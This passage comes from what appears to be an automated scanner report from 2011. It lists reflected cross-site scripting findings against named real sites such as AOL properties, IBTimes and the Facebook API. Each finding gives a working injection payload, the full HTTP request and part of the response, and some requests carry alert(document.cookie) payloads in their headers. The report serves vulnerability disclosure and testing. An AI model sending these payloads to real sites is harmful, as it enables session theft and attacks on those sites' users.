Set-Cookie: FSd3fe7%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea3a3fcc09ff0=uid=15683449; expires=Mon, 07-Feb-2011 20:39:48 GMT; path=/
Set-Cookie: FSd3fe7%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea3a3fcc09ff=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4054&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Sun, 06-Mar-2011 20:39:48 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sun, 06 Feb 2011 20:39:48 GMT
Connection: close
The value of the echo request parameter is copied into the XML document as plain text between tags. The payload ad839<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>d81adcd233 was submitted in the echo parameter. This input was echoed as ad839<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>d81adcd233 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /pfsg/sdr?symbols=dji:$indu&service=chartdetail&f=xml&dtype=configurable&tf=d,1&gran=i&fids=i,h,l,o,c,v,pc&q=1&backfill=1&echouri=1&tm=1&dt=1&tr=1&echo=determineTDIsByResponsead839<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>d81adcd233 HTTP/1.1
Host: adv-chart-app.app.aol.com
Proxy-Connection: keep-alive
Referer: http://o.aolcdn.com/os/money/flash/MinimalChart.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; s_sess=%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B%20s_cc%3Dtrue%3B; s_pers=%20s_getnr%3D1297021708679-New%7C1360093708679%3B%20s_nrgvo%3DNew%7C1360093708704%3B
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store,no-cache,max-age=0,must-revalidate,proxy-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/xml;charset=ISO-8859-1
ntCoent-Length: 30296
Date: Sun, 06 Feb 2011 19:51:46 GMT
Content-Length: 30296
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3fb31'><script>alert(1)</script>0eb8520e7cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /brands/dailyfinance3fb31'><script>alert(1)</script>0eb8520e7cd HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.26. http://advertising.aol.com/brands/dailyfinance [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://advertising.aol.com
Path: /brands/dailyfinance
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c6a5"><script>alert(1)</script>8d254a4718e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /brands/dailyfinance?8c6a5"><script>alert(1)</script>8d254a4718e=1 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bdddb'><script>alert(1)</script>9c1db18b1e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /brands/engadgetbdddb'><script>alert(1)</script>9c1db18b1e0 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.28. http://advertising.aol.com/brands/engadget [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://advertising.aol.com
Path: /brands/engadget
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d672"><script>alert(1)</script>3b70e9dcf4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /brands/engadget?9d672"><script>alert(1)</script>3b70e9dcf4e=1 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.29. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49c3c"-alert(1)-"489c5415bae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?49c3c"-alert(1)-"489c5415bae=1 HTTP/1.1
Host: africa.ibtimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:19:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=dc543bc55452b21506b39f10b8963776; expires=Sun, 06 Feb 2011 22:19:59 GMT; path=/
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-tran
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 56763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<script type="text/javascript">
var exURL = escape("http://www.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?49c3c"-alert(1)-"489c5415bae=1");
var exHed = encodeURIComponent("Google Grants $100 Mln Equity to Eric Schmidt");
var exDek = encodeURIComponent("Search giant Google said it will award $100 million worth of equity to Eri
...[SNIP]...
1.30. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce9ce"><script>alert(1)</script>4fa7211aef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?ce9ce"><script>alert(1)</script>4fa7211aef3=1 HTTP/1.1
Host: africa.ibtimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:19:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=b470a06fa0e8e476a5bf0dab6d10a9ed; expires=Sun, 06 Feb 2011 22:19:56 GMT; path=/
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-tran
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 56853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<input type="hidden" id="urlhome" value="http://www.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?ce9ce"><script>alert(1)</script>4fa7211aef3=1">
...[SNIP]...
1.31. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6330e'-alert(1)-'bdd8bdef0e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?6330e'-alert(1)-'bdd8bdef0e3=1 HTTP/1.1
Host: africa.ibtimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:20:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=8dc726c62f556b216ff22cbd19d8797c; expires=Sun, 06 Feb 2011 22:20:01 GMT; path=/
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-tran
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 56763
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 7afda<script>alert(1)</script>150cf4dbb8a was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/aol/mbox/standard?mboxHost=travel.aol.com&mboxSession=1297021706926-216891&mboxPage=1297021706926-216891&screenHeight=1200&screenWidth=1920&browserWidth=1001&browserHeight=1031&browserTimeOffset=-360&colorDepth=16&mboxCount=1&dept=Main&subDept=Travel%20Main&pageName=Travel%20Main&mbox=AOL_Travel_Global7afda<script>alert(1)</script>150cf4dbb8a&mboxId=0&mboxTime=1297000108866&mboxURL=http%3A%2F%2Ftravel.aol.com%2F&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: aol.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://travel.aol.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 213
Date: Sun, 06 Feb 2011 19:51:18 GMT
Server: Test & Target
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 5751e<script>alert(1)</script>0a7121bf666 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.json?api_key=r9t72482usanbp6sphprhvun5751e<script>alert(1)</script>0a7121bf666&callback=bizo_callback HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KcHQgjfsRES4aj5XcunNcMDa7Re6IGD4lD9isMW4yisjii3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRxzXHkaVY6akFDLPXLn6FqEVUJBxdqAyD5JvasruiiXn4DYsCJ0KjazaTSYX2qPr7QipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie
Response
HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 06 Feb 2011 20:59:22 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive
Unknown API key: (r9t72482usanbp6sphprhvun5751e<script>alert(1)</script>0a7121bf666)
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a9d50<script>alert(1)</script>8356ded867a was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.json?api_key=r9t72482usanbp6sphprhvun&callback=bizo_callbacka9d50<script>alert(1)</script>8356ded867a HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KcHQgjfsRES4aj5XcunNcMDa7Re6IGD4lD9isMW4yisjii3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRxzXHkaVY6akFDLPXLn6FqEVUJBxdqAyD5JvasruiiXn4DYsCJ0KjazaTSYX2qPr7QipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie
Response
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Sun, 06 Feb 2011 20:59:25 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KerMh8N4wnRRaj5XcunNcMDa7Re6IGD4lFp4YH8CH6lnAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtTclMip9ek9khgmm0D5jgFUisEVUJBxdqAyBeojO7uEzb2p0Yl2wVR6WyPhWWt9YcKJ0ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 203
Connection: keep-alive
The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 8d0f9<a>df4d06c17ec was submitted in the name parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /viapi?action=cookie&value=EyADRWJEY0NpdVl%252BSWFG&name=IgUsFjsrORc3NyILDBo6HychGw%253D%253D8d0f9<a>df4d06c17ec&mode=set HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://content.dimestore.com/prod/swf/V3player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""
The value of the name request parameter is copied into the XML document as plain text between tags. The payload 8e4e5<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>73605709c16 was submitted in the name parameter. This input was echoed as 8e4e5<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>73605709c16 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /viapi?action=cookie&name=IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkJ2c1E%253D8e4e5<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>73605709c16&mode=get HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://content.dimestore.com/prod/swf/V3player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""
Response
HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Sun, 06 Feb 2011 20:25:03 GMT
Content-Type: text/xml
Connection: keep-alive
Content-Length: 244
The value of the value request parameter is copied into the XML document as plain text between tags. The payload a2b55<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>43cd31f02e9 was submitted in the value parameter. This input was echoed as a2b55<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>43cd31f02e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /viapi?action=cookie&value=EyADRWJEY0NpdVl%252BSWFGa2b55<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>43cd31f02e9&name=IgUsFjsrORc3NyILDBo6HychGw%253D%253D&mode=set HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://content.dimestore.com/prod/swf/V3player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""
The value of the method request parameter is copied into the HTML document as plain text between tags. The payload ee046<img%20src%3da%20onerror%3dalert(1)>f2ed30b6f31 was submitted in the method parameter. This input was echoed as ee046<img src=a onerror=alert(1)>f2ed30b6f31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /restserver.php?format=json&method=links.getStatsee046<img%20src%3da%20onerror%3dalert(1)>f2ed30b6f31&urls=http%253A%252F%252Fwww.electronista.com%252Farticles%252F11%252F02%252F04%252Fsales.of.glasses.free.3d.tvs.weaker.than.expected%252F%253Fe4c13%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%252Fscript%25253Ec3b351ab889%253D1&callback=aptureJsonCallback0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsmallbusiness.aol.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fsmallbusiness.aol.com%252F%253F998a2%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9cd08062e59%253D1%26extra_2%3DUS
Response
HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Cnection: close
Date: Sun, 06 Feb 2011 20:38:25 GMT
Content-Length: 481
The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload 9cac7<img%20src%3da%20onerror%3dalert(1)>428383ff7dc was submitted in the urls parameter. This input was echoed as 9cac7<img src=a onerror=alert(1)>428383ff7dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /restserver.php?format=json&method=links.getStats&urls=http%253A%252F%252Fwww.electronista.com%252Farticles%252F11%252F02%252F04%252Fsales.of.glasses.free.3d.tvs.weaker.than.expected%252F%253Fe4c13%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%252Fscript%25253Ec3b351ab889%253D19cac7<img%20src%3da%20onerror%3dalert(1)>428383ff7dc&callback=aptureJsonCallback0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsmallbusiness.aol.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fsmallbusiness.aol.com%252F%253F998a2%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9cd08062e59%253D1%26extra_2%3DUS
Response
HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 06 Feb 2011 12:40:37 -0800
Pragma:
X-Cnection: close
Date: Sun, 06 Feb 2011 20:38:37 GMT
Content-Length: 642
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload c96be<script>alert(1)</script>92b20bf3bf8 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /auth/getToken?devId=ao1atoKNL9675h&attributes=displayName,profileUrl,pictureUrl&f=json&c=jsonp1297023979135c96be<script>alert(1)</script>92b20bf3bf8 HTTP/1.1
Host: api.screenname.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aolhealth.com/?efb95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2a680ac5448=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:25:23 GMT
Set-Cookie: JSESSIONID=6A020E7511383C0E38BF9DB8FCE3D07B; Path=/auth
Set-Cookie: OASC=diAxLjAgayAwIHlaWi9nVVBheFN2ZUJHcFZEYUNtcjFUNVhkWT0%3D-SSQdmqasJXW7AratTMW0Ebo0fFONkRgKp3Nz8AP0G2hDlYt5hoCp0D9upWW2a1M1tALOCnjOZLBFwhvg5agWxYIVALonDKGqbQQsQOEEfCl4FW0AirWAhSnABCxmMQEil%2FSriE29mS1hitvGyQTxzNUbM7yoamEoiPR1QMeJ9Sf8QCgk%2FH84DuWWFf2GJBVS; Path=/; HTTPOnly
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 130
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f3298<script>alert(1)</script>b6048824017 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /url_info.jsonc?url=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&callback=aptureJsonCallback1f3298<script>alert(1)</script>b6048824017 HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
